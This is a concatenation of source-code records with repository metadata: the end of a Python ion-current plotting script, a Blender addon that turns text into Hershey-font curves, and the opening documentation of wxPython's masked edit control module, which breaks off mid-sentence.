alpha=0.5, lw=0.4, c='C2', zorder=2,
label='Eyring')
# Q10
q10_sim = model.simulate(q10_model_param[i_cell], times_sim)
if prt in protocol_iv:
q10_sim, t = protocol_iv_convert[prt](q10_sim, times_sim)
assert(np.mean(np.abs(t - times)) < 1e-8)
iv_v = protocol_iv_v[prt]() * 1000 # mV
iv_i = protocols.get_corrected_iv(q10_sim, times,
*protocol_iv_args[prt]())
axes[1, i_T].plot(iv_v, iv_i / np.max(iv_i), lw=0.4, alpha=0.5,
c='C3', zorder=3, label='Q10')
axes[1, i_T].grid()
else:
axes[1, i_T].plot(times_sim,
q10_sim / q10_model_param[i_cell][0],
alpha=0.5, lw=0.4, c='C3', zorder=3,
label='Q10')
axes[1, i_T].set_ylim(prt_ylim[i_prt])
# Save fig
axes[1, 2].set_xlabel('Time [s]')
axes[0, 0].set_ylabel('Voltage [mV]')
axes[1, 0].set_ylabel('Current [pA]')
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
plt.savefig('%s/quick-plots/%s.png' % (savedir, prt), bbox_iches='tight')
plt.close('all')
| [
"chonloklei@gmail.com"
] | chonloklei@gmail.com |
e71eaed9117be7ba96c66bb470702e4c5a86beee | c6c988dfc41ba82d8b4da35be19ab9270ba465fb | /hershey_text.py | 66b3f38cefdbcf398d351a37a7b08524205b8b87 | [] | no_license | Tesla-Coil/blender-hershey-text | 55cd4d96dab6620be9503aecd00899010dbccc73 | 68d8188c4012b8de2dcc07e8532cb9f6e8a7f7de | refs/heads/master | 2020-03-27T03:44:40.440185 | 2017-04-15T09:26:26 | 2017-04-15T09:26:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,353 | py | #+
# This addon for Blender 2.7 uses the Hershey fonts to turn a text
# object into a collection of curves. Also needs HersheyPy
# <https://github.com/ldo/hersheypy> to be installed.
#
# Copyright 2015, 2017 Lawrence D'Oliveiro <ldo@geek-central.gen.nz>.
# Licensed under CC-BY-SA <http://creativecommons.org/licenses/by-sa/4.0/>.
#-
import math
import sys # debug
import os
import bpy
import mathutils
import hershey_font
bl_info = \
{
"name" : "Hershey Text",
"author" : "Lawrence D'Oliveiro <ldo@geek-central.gen.nz>",
"version" : (0, 5, 0),
"blender" : (2, 7, 8),
"location" : "View 3D > Object Mode > Tool Shelf",
"description" :
"Uses a Hershey font to turn a text object into a collection of curves.",
"warning" : "",
"wiki_url" : "",
"tracker_url" : "",
"category" : "Object",
}
class Failure(Exception) :
def __init__(self, msg) :
self.msg = msg
#end __init__
#end Failure
def list_hershey_fonts() :
result = [(" ", "(pick a font)", "")]
for item in hershey_font.each_name() :
result.append \
(
(item, item, "")
)
#end for
return \
sorted(result, key = lambda i : i[0])
#end list_hershey_fonts
class HersheyText(bpy.types.Operator) :
bl_idname = "text.hersheyfy"
bl_label = "Hershey Text"
bl_context = "objectmode"
bl_options = {"REGISTER", "UNDO"}
font_name = bpy.props.EnumProperty \
(
name = "Hershey Font",
description = "name of Hershey font to use",
items = list_hershey_fonts(),
)
curve_type = bpy.props.EnumProperty \
(
name = "Curve Type",
description = "type of curves to create",
items =
(
("POLY", "Poly", ""),
("BEZIER", "Bézier", ""),
# others seem to produce empty curves, disable for now
#("BSPLINE", "B-Spline", ""),
#("CARDINAL", "Cardinal", ""),
#("NURBS", "NURBS", ""),
),
default = "BEZIER",
)
sharp_angle = bpy.props.FloatProperty \
(
name = "Sharp Angle",
description = "Bézier curve angles below this become corners",
subtype = "ANGLE",
default = math.pi / 2,
)
delete_text = bpy.props.BoolProperty \
(
name = "Delete Original Text",
description = "delete the original text object",
default = False
)
@classmethod
def poll(celf, context) :
active_object = context.scene.objects.active
return \
(
context.mode == "OBJECT"
and
active_object != None
#and
# active_object.select
and
active_object.type in ("FONT", "CURVE")
)
#end poll
def draw(self, context) :
the_col = self.layout.column(align = True)
the_col.label("Hershey Font:")
the_col.prop(self, "font_name")
the_col.prop(self, "curve_type")
the_col.prop(self, "sharp_angle")
the_col.prop(self, "delete_text")
#end draw
def action_common(self, context, redoing) :
try :
if not redoing :
text_object = context.scene.objects.active
if text_object == None or not text_object.select :
raise Failure("no selected object")
#end if
if text_object.type != "FONT" or type(text_object.data) != bpy.types.TextCurve :
raise Failure("need to operate on a font object")
#end if
# save the name of the object so I can find it again
# when I'm reexecuted. Can't save a direct reference,
# as that is likely to become invalid. Blender guarantees
# the name is unique anyway.
self.orig_object_name = text_object.name
else :
text_object = context.scene.objects[self.orig_object_name]
assert text_object.type == "FONT" and type(text_object.data) == bpy.types.TextCurve
#end if
if self.font_name != " " :
the_font = hershey_font.HersheyGlyphs.load(self.font_name)
else :
the_font = None
#end if
curve_name = text_object.name + " hersh"
curve_data = bpy.data.curves.new(curve_name, "CURVE")
if the_font != None :
scaling = \
(
mathutils.Matrix.Scale
(
-1, # factor
4, # size
mathutils.Vector((0, 1, 0)), # axis
) # flip Y-axis
*
mathutils.Matrix.Scale
(
the_font.scale, # factor
4 # size
)
)
text_data = text_object.data
# TODO: text boxes, character formats
pos = mathutils.Vector((0, 0, 0))
for ch in text_data.body :
if the_font.encoding != None :
glyph_nr = the_font.encoding.get(ord(ch))
else :
glyph_nr = ord(ch)
#end if
if glyph_nr != None :
the_glyph = the_font.glyphs.get(glyph_nr)
else :
the_glyph = None
#end if
# note each new curve Spline already seems to have one point to begin with
if the_glyph != None :
glyph_width = the_glyph.max_x - the_glyph.min_x
for pathseg in the_glyph.path :
curve_spline = curve_data.splines.new(self.curve_type)
is_bezier = self.curve_type == "BEZIER"
points = (curve_spline.points, curve_spline.bezier_points)[is_bezier]
for i, point in enumerate(pathseg) :
if i != 0 :
points.add()
#end if
points[i].co = \
(
mathutils.Matrix.Scale
(
text_data.size, # factor
4, # size
)
*
mathutils.Matrix.Shear
(
"XZ" , # plane
4, # size
[text_data.shear, 0], # factor
)
*
mathutils.Matrix.Translation(pos)
*
scaling
*
mathutils.Vector((point.x, point.y - the_font.baseline_y, 0))
).resized((4, 3)[is_bezier])
#end for
if is_bezier :
sharp_angle = self.sharp_angle
for i in range(len(pathseg)) :
try :
angle = \
(
(points[(i + 1) % len(pathseg)].co - points[i].co)
.angle
(points[i].co - points[(i - 1) % len(pathseg)].co)
)
except ValueError :
# assume zero-length vector somewhere
angle = 0
#end if
angle = math.pi - angle
if angle < sharp_angle :
# make it a corner
points[i].handle_left_type = "FREE"
points[i].handle_right_type = "FREE"
points[i].handle_left = points[i].co
points[i].handle_right = points[i].co
else :
# make it curve
points[i].handle_left_type = "AUTO"
points[i].handle_right_type = "AUTO"
#end if
#end for
#end if
#end for
else :
glyph_width = the_font.max.x - the_font.min.x
curve_spline = curve_data.splines.new("POLY")
curve_spline.points.add(3)
for i, corner_x, corner_y in \
(
(0, the_font.min.x, the_font.min.y),
(1, the_font.max.x, the_font.min.y),
(2, the_font.max.x, the_font.max.y),
(3, the_font.min.x, the_font.max.y),
) \
:
curve_spline.points[i].co = \
(
mathutils.Matrix.Translation(pos)
*
scaling
*
mathutils.Vector((corner_x, corner_y - the_font.baseline_y, 0))
).resized(4)
#end for
curve_spline.use_cyclic_u = True
#end if
pos += mathutils.Vector((glyph_width * the_font.scale, 0, 0))
#end for
#end if
curve_obj = bpy.data.objects.new(curve_name, curve_data)
context.scene.objects.link(curve_obj)
curve_obj.matrix_local = text_object.matrix_local
bpy.ops.object.select_all(action = "DESELECT")
bpy.data.objects[curve_name].select = True
context.scene.objects.active = curve_obj
if self.delete_text :
context.scene.objects.unlink(text_object)
bpy.data.objects.remove(text_object)
#end if
# all done
status = {"FINISHED"}
except Failure as why :
sys.stderr.write("Failure: {}\n".format(why.msg)) # debug
self.report({"ERROR"}, why.msg)
status = {"CANCELLED"}
#end try
return \
status
#end action_common
def execute(self, context) :
return \
self.action_common(context, True)
#end execute
def invoke(self, context, event) :
return \
self.action_common(context, False)
#end invoke
#end HersheyText
def add_invoke_button(self, context) :
if HersheyText.poll(context) :
the_col = self.layout.column(align = True) # gives a nicer grouping of my items
the_col.label("Hersheyfy:")
the_col.operator(HersheyText.bl_idname, text = "Do It")
#end if
#end add_invoke_button
def register() :
bpy.utils.register_module(__name__)
bpy.types.VIEW3D_PT_tools_object.append(add_invoke_button)
#end register
def unregister() :
bpy.utils.unregister_module(__name__)
bpy.types.VIEW3D_PT_tools_object.remove(add_invoke_button)
#end unregister
if __name__ == "__main__" :
register()
#end if
| [
"ldo@geek-central.gen.nz"
] | ldo@geek-central.gen.nz |
740076bd72d210a9f6c56fbb3ea2285ea4ce1f16 | dca653bb975528bd1b8ab2547f6ef4f48e15b7b7 | /tags/wxPy-2.8.10.1/wxPython/wx/lib/masked/maskededit.py | e2b73b16794154fc23584bfb12edc07f6717afed | [] | no_license | czxxjtu/wxPython-1 | 51ca2f62ff6c01722e50742d1813f4be378c0517 | 6a7473c258ea4105f44e31d140ea5c0ae6bc46d8 | refs/heads/master | 2021-01-15T12:09:59.328778 | 2015-01-05T20:55:10 | 2015-01-05T20:55:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343,459 | py | #----------------------------------------------------------------------------
# Name: maskededit.py
# Authors: Will Sadkin, Jeff Childers
# Email: wsadkin@parlancecorp.com, jchilders_98@yahoo.com
# Created: 02/11/2003
# Copyright: (c) 2003 by Jeff Childers, Will Sadkin, 2003
# Portions: (c) 2002 by Will Sadkin, 2002-2007
# RCS-ID: $Id$
# License: wxWidgets license
#----------------------------------------------------------------------------
# NOTE:
# MaskedEdit controls are based on a suggestion made on [wxPython-Users] by
# Jason Hihn, and borrows liberally from Will Sadkin's original masked edit
# control for time entry, TimeCtrl (which is now rewritten using this
# control!).
#
# MaskedEdit controls do not normally use validators, because they do
# careful manipulation of the cursor in the text window on each keystroke,
# and validation is cursor-position specific, so the control intercepts the
# key codes before the validator would fire. However, validators can be
# provided to do data transfer to the controls.
#
#----------------------------------------------------------------------------
#
# This file now contains the bulk of the logic behind all masked controls,
# the MaskedEditMixin class, the Field class, and the autoformat codes.
#
#----------------------------------------------------------------------------
#
# 03/30/2004 - Will Sadkin (wsadkin@parlancecorp.com)
#
# o Split out TextCtrl, ComboBox and IpAddrCtrl into their own files,
# o Reorganized code into masked package
#
# 12/09/2003 - Jeff Grimmett (grimmtooth@softhome.net)
#
# o Updated for wx namespace. No guarantees. This is one huge file.
#
# 12/13/2003 - Jeff Grimmett (grimmtooth@softhome.net)
#
# o Missed wx.DateTime stuff earlier.
#
# 12/20/2003 - Jeff Grimmett (grimmtooth@softhome.net)
#
# o MaskedEditMixin -> MaskedEditMixin
# o wxMaskedTextCtrl -> maskedTextCtrl
# o wxMaskedComboBoxSelectEvent -> MaskedComboBoxSelectEvent
# o wxMaskedComboBox -> MaskedComboBox
# o wxIpAddrCtrl -> IpAddrCtrl
# o wxTimeCtrl -> TimeCtrl
#
__doc__ = """\
contains MaskedEditMixin class that drives all the other masked controls.
====================
Masked Edit Overview
====================
masked.TextCtrl:
is a sublassed text control that can carefully control the user's input
based on a mask string you provide.
General usage example::
control = masked.TextCtrl( win, -1, '', mask = '(###) ###-####')
The example above will create a text control that allows only numbers to be
entered and then only in the positions indicated in the mask by the # sign.
masked.ComboBox:
is a similar subclass of wxComboBox that allows the same sort of masking,
but also can do auto-complete of values, and can require the value typed
to be in the list of choices to be colored appropriately.
masked.Ctrl:
is actually a factory function for several types of masked edit controls:
================= ==================================================
masked.TextCtrl standard masked edit text box
masked.ComboBox adds combobox capabilities
masked.IpAddrCtrl adds special semantics for IP address entry
masked.TimeCtrl special subclass handling lots of types as values
masked.NumCtrl special subclass handling numeric values
================= ==================================================
It works by looking for a *controlType* parameter in the keyword
arguments of the control, to determine what kind of instance to return.
If not specified as a keyword argument, the default control type returned
will be masked.TextCtrl.
Each of the above classes has its own set of arguments, but masked.Ctrl
provides a single "unified" interface for masked controls.
What follows is a description of how to configure the generic masked.TextCtrl
and masked.ComboBox; masked.NumCtrl and masked.TimeCtrl have their own demo
pages and interface descriptions.
=========================
Initialization Parameters
-------------------------
mask
Allowed mask characters and function:
========= ==========================================================
Character Function
========= ==========================================================
# Allow numeric only (0-9)
N Allow letters and numbers (0-9)
A Allow uppercase letters only
a Allow lowercase letters only
C Allow any letter, upper or lower
X Allow string.letters, string.punctuation, string.digits
& Allow string.punctuation only (doesn't include all unicode symbols)
\* Allow any visible character
| explicit field boundary (takes no space in the control; allows mix
of adjacent mask characters to be treated as separate fields,
eg: '&|###' means "field 0 = '&', field 1 = '###'", but there's
no fixed characters in between.
========= ==========================================================
These controls define these sets of characters using string.letters,
string.uppercase, etc. These sets are affected by the system locale
setting, so in order to have the masked controls accept characters
that are specific to your users' language, your application should
set the locale.
For example, to allow international characters to be used in the
above masks, you can place the following in your code as part of
your application's initialization code::
import locale
locale.setlocale(locale.LC_ALL, '')
The controls now also support (by popular demand) all "visible" characters,
by use of the * mask character, including unicode characters above
the standard ANSI keycode range.
Note: As string.punctuation doesn't typically include all unicode
symbols, you will have to use includechars to get some of these into
otherwise restricted positions in your control, such as those specified
with &.
Using these mask characters, a variety of template masks can be built. See
the demo for some other common examples include date+time, social security
number, etc. If any of these characters are needed as template rather
than mask characters, they can be escaped with \, ie. \N means "literal N".
(use \\ for literal backslash, as in: r'CCC\\NNN'.)
*Note:*
Masks containing only # characters and one optional decimal point
character are handled specially, as "numeric" controls. Such
controls have special handling for typing the '-' key, handling
the "decimal point" character as truncating the integer portion,
optionally allowing grouping characters and so forth.
There are several parameters and format codes that only make sense
when combined with such masks, eg. groupChar, decimalChar, and so
forth (see below). These allow you to construct reasonable
numeric entry controls.
*Note:*
Changing the mask for a control deletes any previous field classes
(and any associated validation or formatting constraints) for them.
useFixedWidthFont
By default, masked edit controls use a fixed width font, so that
the mask characters are fixed within the control, regardless of
subsequent modifications to the value. Set to False if having
the control font be the same as other controls is required. (This is
a control-level parameter.)
defaultEncoding
(Applies to unicode systems only) By default, the default unicode encoding
used is latin1, or iso-8859-1. If necessary, you can set this control-level
parameter to govern the codec used to decode your keyboard inputs.
(This is a control-level parameter.)
formatcodes
These other properties can be passed to the class when instantiating it:
Formatcodes are specified as a string of single character formatting
codes that modify behavior of the control::
_ Allow spaces
! Force upper
^ Force lower
R Right-align field(s)
r Right-insert in field(s) (implies R)
< Stay in field until explicit navigation out of it
> Allow insert/delete within partially filled fields (as
opposed to the default "overwrite" mode for fixed-width
masked edit controls.) This allows single-field controls
or each field within a multi-field control to optionally
behave more like standard text controls.
(See EMAIL or phone number autoformat examples.)
*Note: This also governs whether backspace/delete operations
shift contents of field to right of cursor, or just blank the
erased section.
Also, when combined with 'r', this indicates that the field
or control allows right insert anywhere within the current
non-empty value in the field. (Otherwise right-insert behavior
is only performed to when the entire right-insertable field is
selected or the cursor is at the right edge of the field.*
, Allow grouping character in integer fields of numeric controls
and auto-group/regroup digits (if the result fits) when leaving
such a field. (If specified, .SetValue() will attempt to
auto-group as well.)
',' is also the default grouping character. To change the
grouping character and/or decimal character, use the groupChar
and decimalChar parameters, respectively.
Note: typing the "decimal point" character in such fields will
clip the value to that left of the cursor for integer
fields of controls with "integer" or "floating point" masks.
If the ',' format code is specified, this will also cause the
resulting digits to be regrouped properly, using the current
grouping character.
- Prepend and reserve leading space for sign to mask and allow
signed values (negative #s shown in red by default.) Can be
used with argument useParensForNegatives (see below.)
0 integer fields get leading zeros
D Date[/time] field
T Time field
F Auto-Fit: the control calulates its size from
the length of the template mask
V validate entered chars against validRegex before allowing them
to be entered vs. being allowed by basic mask and then having
the resulting value just colored as invalid.
(See USSTATE autoformat demo for how this can be used.)
S select entire field when navigating to new field
fillChar
defaultValue
These controls have two options for the initial state of the control.
If a blank control with just the non-editable characters showing
is desired, simply leave the constructor variable fillChar as its
default (' '). If you want some other character there, simply
change the fillChar to that value. Note: changing the control's fillChar
will implicitly reset all of the fields' fillChars to this value.
If you need different default characters in each mask position,
you can specify a defaultValue parameter in the constructor, or
set them for each field individually.
This value must satisfy the non-editable characters of the mask,
but need not conform to the replaceable characters.
groupChar
decimalChar
These parameters govern what character is used to group numbers
and is used to indicate the decimal point for numeric format controls.
The default groupChar is ',', the default decimalChar is '.'
By changing these, you can customize the presentation of numbers
for your location.
Eg::
formatcodes = ',', groupChar='\'' allows 12'345.34
formatcodes = ',', groupChar='.', decimalChar=',' allows 12.345,34
(These are control-level parameters.)
shiftDecimalChar
The default "shiftDecimalChar" (used for "backwards-tabbing" until
shift-tab is fixed in wxPython) is '>' (for QUERTY keyboards.) for
other keyboards, you may want to customize this, eg '?' for shift ',' on
AZERTY keyboards, ':' or ';' for other European keyboards, etc.
(This is a control-level parameter.)
useParensForNegatives=False
This option can be used with signed numeric format controls to
indicate signs via () rather than '-'.
(This is a control-level parameter.)
autoSelect=False
This option can be used to have a field or the control try to
auto-complete on each keystroke if choices have been specified.
autoCompleteKeycodes=[]
By default, DownArrow, PageUp and PageDown will auto-complete a
partially entered field. Shift-DownArrow, Shift-UpArrow, PageUp
and PageDown will also auto-complete, but if the field already
contains a matched value, these keys will cycle through the list
of choices forward or backward as appropriate. Shift-Up and
Shift-Down also take you to the next/previous field after any
auto-complete action.
Additional auto-complete keys can be specified via this parameter.
Any keys so specified will act like PageDown.
(This is a control-level parameter.)
Validating User Input
=====================
There are a variety of initialization parameters that are used to validate
user input. These parameters can apply to the control as a whole, and/or
to individual fields:
===================== ==================================================================
excludeChars A string of characters to exclude even if otherwise allowed
includeChars A string of characters to allow even if otherwise disallowed
validRegex Use a regular expression to validate the contents of the text box
validRange Pass a rangeas list (low,high) to limit numeric fields/values
choices A list of strings that are allowed choices for the control.
choiceRequired value must be member of choices list
compareNoCase Perform case-insensitive matching when validating against list
*Note: for masked.ComboBox, this defaults to True.*
emptyInvalid Boolean indicating whether an empty value should be considered
invalid
validFunc A function to call of the form: bool = func(candidate_value)
which will return True if the candidate_value satisfies some
external criteria for the control in addition to the the
other validation, or False if not. (This validation is
applied last in the chain of validations.)
validRequired Boolean indicating whether or not keys that are allowed by the
mask, but result in an invalid value are allowed to be entered
into the control. Setting this to True implies that a valid
default value is set for the control.
retainFieldValidation False by default; if True, this allows individual fields to
retain their own validation constraints independently of any
subsequent changes to the control's overall parameters.
(This is a control-level parameter.)
validator Validators are not normally needed for masked controls, because
of the nature of the validation and control of input. However,
you can supply one to provide data transfer routines for the
controls.
raiseOnInvalidPaste False by default; normally a bad paste simply is ignored with a bell;
if True, this will cause a ValueError exception to be thrown,
with the .value attribute of the exception containing the bad value.
stopFieldChangeIfInvalid
False by default; tries to prevent navigation out of a field if its
current value is invalid. Can be used to create a hybrid of validation
settings, allowing intermediate invalid values in a field without
sacrificing ability to limit values as with validRequired.
NOTE: It is possible to end up with an invalid value when using
this option if focus is switched to some other control via mousing.
To avoid this, consider deriving a class that defines _LostFocus()
function that returns the control to a valid value when the focus
shifts. (AFAICT, The change in focus is unpreventable.)
===================== =================================================================
Coloring Behavior
=================
The following parameters have been provided to allow you to change the default
coloring behavior of the control. These can be set at construction, or via
the .SetCtrlParameters() function. Pass a color as string e.g. 'Yellow':
======================== =======================================================================
emptyBackgroundColour Control Background color when identified as empty. Default=White
invalidBackgroundColour Control Background color when identified as Not valid. Default=Yellow
validBackgroundColour Control Background color when identified as Valid. Default=white
======================== =======================================================================
The following parameters control the default foreground color coloring behavior of the
control. Pass a color as string e.g. 'Yellow':
======================== ======================================================================
foregroundColour Control foreground color when value is not negative. Default=Black
signedForegroundColour Control foreground color when value is negative. Default=Red
======================== ======================================================================
Fields
======
Each part of the mask that allows user input is considered a field. The fields
are represented by their own class instances. You can specify field-specific
constraints by constructing or accessing the field instances for the control
and then specifying those constraints via parameters.
fields
This parameter allows you to specify Field instances containing
constraints for the individual fields of a control, eg: local
choice lists, validation rules, functions, regexps, etc.
It can be either an ordered list or a dictionary. If a list,
the fields will be applied as fields 0, 1, 2, etc.
If a dictionary, it should be keyed by field index.
the values should be a instances of maskededit.Field.
Any field not represented by the list or dictionary will be
implicitly created by the control.
Eg::
fields = [ Field(formatcodes='_r'), Field('choices=['a', 'b', 'c']) ]
Or::
fields = {
1: ( Field(formatcodes='_R', choices=['a', 'b', 'c']),
3: ( Field(choices=['01', '02', '03'], choiceRequired=True)
}
The following parameters are available for individual fields, with the
same semantics as for the whole control but applied to the field in question:
============== =============================================================================
fillChar if set for a field, it will override the control's fillChar for that field
groupChar if set for a field, it will override the control's default
defaultValue sets field-specific default value; overrides any default from control
compareNoCase overrides control's settings
emptyInvalid determines whether field is required to be filled at all times
validRequired if set, requires field to contain valid value
============== =============================================================================
If any of the above parameters are subsequently specified for the control as a
whole, that new value will be propagated to each field, unless the
retainFieldValidation control-level parameter is set.
============== ==============================
formatcodes Augments control's settings
excludeChars ' ' '
includeChars ' ' '
validRegex ' ' '
validRange ' ' '
choices ' ' '
choiceRequired ' ' '
validFunc ' ' '
============== ==============================
Control Class Functions
=======================
.GetPlainValue(value=None)
Returns the value specified (or the control's text value
not specified) without the formatting text.
In the example above, might return phone no='3522640075',
whereas control.GetValue() would return '(352) 264-0075'
.ClearValue()
Returns the control's value to its default, and places the
cursor at the beginning of the control.
.SetValue()
Does "smart replacement" of passed value into the control, as does
the .Paste() method. As with other text entry controls, the
.SetValue() text replacement begins at left-edge of the control,
with missing mask characters inserted as appropriate.
.SetValue will also adjust integer, float or date mask entry values,
adding commas, auto-completing years, etc. as appropriate.
For "right-aligned" numeric controls, it will also now automatically
right-adjust any value whose length is less than the width of the
control before attempting to set the value.
If a value does not follow the format of the control's mask, or will
not fit into the control, a ValueError exception will be raised.
Eg::
mask = '(###) ###-####'
.SetValue('1234567890') => '(123) 456-7890'
.SetValue('(123)4567890') => '(123) 456-7890'
.SetValue('(123)456-7890') => '(123) 456-7890'
.SetValue('123/4567-890') => illegal paste; ValueError
mask = '#{6}.#{2}', formatcodes = '_,-',
.SetValue('111') => ' 111 . '
.SetValue(' %9.2f' % -111.12345 ) => ' -111.12'
.SetValue(' %9.2f' % 1234.00 ) => ' 1,234.00'
.SetValue(' %9.2f' % -1234567.12345 ) => insufficient room; ValueError
mask = '#{6}.#{2}', formatcodes = '_,-R' # will right-adjust value for right-aligned control
.SetValue('111') => padded value misalignment ValueError: " 111" will not fit
.SetValue('%.2f' % 111 ) => ' 111.00'
.SetValue('%.2f' % -111.12345 ) => ' -111.12'
.IsValid(value=None)
Returns True if the value specified (or the value of the control
if not specified) passes validation tests
.IsEmpty(value=None)
Returns True if the value specified (or the value of the control
if not specified) is equal to an "empty value," ie. all
editable characters == the fillChar for their respective fields.
.IsDefault(value=None)
Returns True if the value specified (or the value of the control
if not specified) is equal to the initial value of the control.
.Refresh()
Recolors the control as appropriate to its current settings.
.SetCtrlParameters(\*\*kwargs)
This function allows you to set up and/or change the control parameters
after construction; it takes a list of key/value pairs as arguments,
where the keys can be any of the mask-specific parameters in the constructor.
Eg::
ctl = masked.TextCtrl( self, -1 )
ctl.SetCtrlParameters( mask='###-####',
defaultValue='555-1212',
formatcodes='F')
.GetCtrlParameter(parametername)
This function allows you to retrieve the current value of a parameter
from the control.
*Note:* Each of the control parameters can also be set using its
own Set and Get function. These functions follow a regular form:
All of the parameter names start with lower case; for their
corresponding Set/Get function, the parameter name is capitalized.
Eg::
ctl.SetMask('###-####')
ctl.SetDefaultValue('555-1212')
ctl.GetChoiceRequired()
ctl.GetFormatcodes()
*Note:* After any change in parameters, the choices for the
control are reevaluated to ensure that they are still legal. If you
have large choice lists, it is therefore more efficient to set parameters
before setting the choices available.
.SetFieldParameters(field_index, \*\*kwargs)
This function allows you to specify change individual field
parameters after construction. (Indices are 0-based.)
.GetFieldParameter(field_index, parametername)
Allows the retrieval of field parameters after construction
The control detects certain common constructions. In order to use the signed feature
(negative numbers and coloring), the mask has to be all numbers with optionally one
decimal point. Without a decimal (e.g. '######', the control will treat it as an integer
value. With a decimal (e.g. '###.##'), the control will act as a floating point control
(i.e. press decimal to 'tab' to the decimal position). Pressing decimal in the
integer control truncates the value. However, for a true numeric control,
masked.NumCtrl provides all this, and true numeric input/output support as well.
Check your controls by calling each control's .IsValid() function and the
.IsEmpty() function to determine which controls have been a) filled in and
b) filled in properly.
Regular expression validations can be used flexibly and creatively.
Take a look at the demo; the zip-code validation succeeds as long as the
first five numerals are entered. the last four are optional, but if
any are entered, there must be 4 to be valid.
masked.Ctrl Configuration
=========================
masked.Ctrl works by looking for a special *controlType*
parameter in the variable arguments of the control, to determine
what kind of instance to return.
controlType can be one of::
controlTypes.TEXT
controlTypes.COMBO
controlTypes.IPADDR
controlTypes.TIME
controlTypes.NUMBER
These constants are also available individually, ie, you can
use either of the following::
from wxPython.wx.lib.masked import MaskedCtrl, controlTypes
from wxPython.wx.lib.masked import MaskedCtrl, COMBO, TEXT, NUMBER, IPADDR
If not specified as a keyword argument, the default controlType is
controlTypes.TEXT.
"""
"""
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
DEVELOPER COMMENTS:
Naming Conventions
------------------
All methods of the Mixin that are not meant to be exposed to the external
interface are prefaced with '_'. Those functions that are primarily
intended to be internal subroutines subsequently start with a lower-case
letter; those that are primarily intended to be used and/or overridden
by derived subclasses start with a capital letter.
The following methods must be used and/or defined when deriving a control
from MaskedEditMixin. NOTE: if deriving from a *masked edit* control
(eg. class IpAddrCtrl(masked.TextCtrl) ), then this is NOT necessary,
as it's already been done for you in the base class.
._SetInitialValue()
This function must be called after the associated base
control has been initialized in the subclass __init__
function. It sets the initial value of the control,
either to the value specified if non-empty, the
default value if specified, or the "template" for
the empty control as necessary. It will also set/reset
the font if necessary and apply formatting to the
control at this time.
._GetSelection()
REQUIRED
Each class derived from MaskedEditMixin must define
the function for getting the start and end of the
current text selection. The reason for this is
that not all controls have the same function name for
doing this; eg. wx.TextCtrl uses .GetSelection(),
whereas we had to write a .GetMark() function for
wxComboBox, because .GetSelection() for the control
gets the currently selected list item from the combo
box, and the control doesn't (yet) natively provide
a means of determining the text selection.
._SetSelection()
REQUIRED
Similarly to _GetSelection, each class derived from
MaskedEditMixin must define the function for setting
the start and end of the current text selection.
(eg. .SetSelection() for masked.TextCtrl, and .SetMark() for
masked.ComboBox.
._GetInsertionPoint()
._SetInsertionPoint()
REQUIRED
For consistency, and because the mixin shouldn't rely
on fixed names for any manipulations it does of any of
the base controls, we require each class derived from
MaskedEditMixin to define these functions as well.
._GetValue()
._SetValue() REQUIRED
Each class derived from MaskedEditMixin must define
the functions used to get and set the raw value of the
control.
This is necessary so that recursion doesn't take place
when setting the value, and so that the mixin can
call the appropriate function after doing all its
validation and manipulation without knowing what kind
of base control it was mixed in with. To handle undo
functionality, the ._SetValue() must record the current
selection prior to setting the value.
.Cut()
.Paste()
.Undo()
.SetValue() REQUIRED
Each class derived from MaskedEditMixin must redefine
these functions to call the _Cut(), _Paste(), _Undo()
and _SetValue() methods, respectively for the control,
so as to prevent programmatic corruption of the control's
value. This must be done in each derivation, as the
mixin cannot itself override a member of a sibling class.
._Refresh() REQUIRED
Each class derived from MaskedEditMixin must define
the function used to refresh the base control.
.Refresh() REQUIRED
Each class derived from MaskedEditMixin must redefine
this function so that it checks the validity of the
control (via self._CheckValid) and then refreshes
control using the base class method.
._IsEditable() REQUIRED
Each class derived from MaskedEditMixin must define
the function used to determine if the base control is
editable or not. (For masked.ComboBox, this has to
be done with code, rather than specifying the proper
function in the base control, as there isn't one...)
._CalcSize() REQUIRED
Each class derived from MaskedEditMixin must define
the function used to determine how wide the control
should be given the mask. (The mixin function
._calcSize() provides a baseline estimate.)
Event Handling
--------------
Event handlers are "chained", and MaskedEditMixin usually
swallows most of the events it sees, thereby preventing any other
handlers from firing in the chain. It is therefore required that
each class derivation using the mixin to have an option to hook up
the event handlers itself or forego this operation and let a
subclass of the masked control do so. For this reason, each
subclass should probably include the following code:
if setupEventHandling:
## Setup event handlers
EVT_SET_FOCUS( self, self._OnFocus ) ## defeat automatic full selection
EVT_KILL_FOCUS( self, self._OnKillFocus ) ## run internal validator
EVT_LEFT_DCLICK(self, self._OnDoubleClick) ## select field under cursor on dclick
EVT_RIGHT_UP(self, self._OnContextMenu ) ## bring up an appropriate context menu
EVT_KEY_DOWN( self, self._OnKeyDown ) ## capture control events not normally seen, eg ctrl-tab.
EVT_CHAR( self, self._OnChar ) ## handle each keypress
EVT_TEXT( self, self.GetId(), self._OnTextChange ) ## color control appropriately & keep
## track of previous value for undo
where setupEventHandling is an argument to its constructor.
These 5 handlers must be "wired up" for the masked edit
controls to provide default behavior. (The setupEventHandling
is an argument to masked.TextCtrl and masked.ComboBox, so
that controls derived from *them* may replace one of these
handlers if they so choose.)
If your derived control wants to preprocess events before
taking action, it should then set up the event handling itself,
so it can be first in the event handler chain.
The following routines are available to facilitate changing
the default behavior of masked edit controls:
._SetKeycodeHandler(keycode, func)
._SetKeyHandler(char, func)
Use to replace default handling for any given keycode.
func should take the key event as argument and return
False if no further action is required to handle the
key. Eg:
self._SetKeycodeHandler(WXK_UP, self.IncrementValue)
self._SetKeyHandler('-', self._OnChangeSign)
(Setting a func of None removes any keyhandler for the given key.)
"Navigation" keys are assumed to change the cursor position, and
therefore don't cause automatic motion of the cursor as insertable
characters do.
._AddNavKeycode(keycode, handler=None)
._AddNavKey(char, handler=None)
Allows controls to specify other keys (and optional handlers)
to be treated as navigational characters. (eg. '.' in IpAddrCtrl)
._GetNavKeycodes() Returns the current list of navigational keycodes.
._SetNavKeycodes(key_func_tuples)
Allows replacement of the current list of keycode
processed as navigation keys, and bind associated
optional keyhandlers. argument is a list of key/handler
tuples. Passing a value of None for the handler in a
given tuple indicates that default processing for the key
is desired.
._FindField(pos) Returns the Field object associated with this position
in the control.
._FindFieldExtent(pos, getslice=False, value=None)
Returns edit_start, edit_end of the field corresponding
to the specified position within the control, and
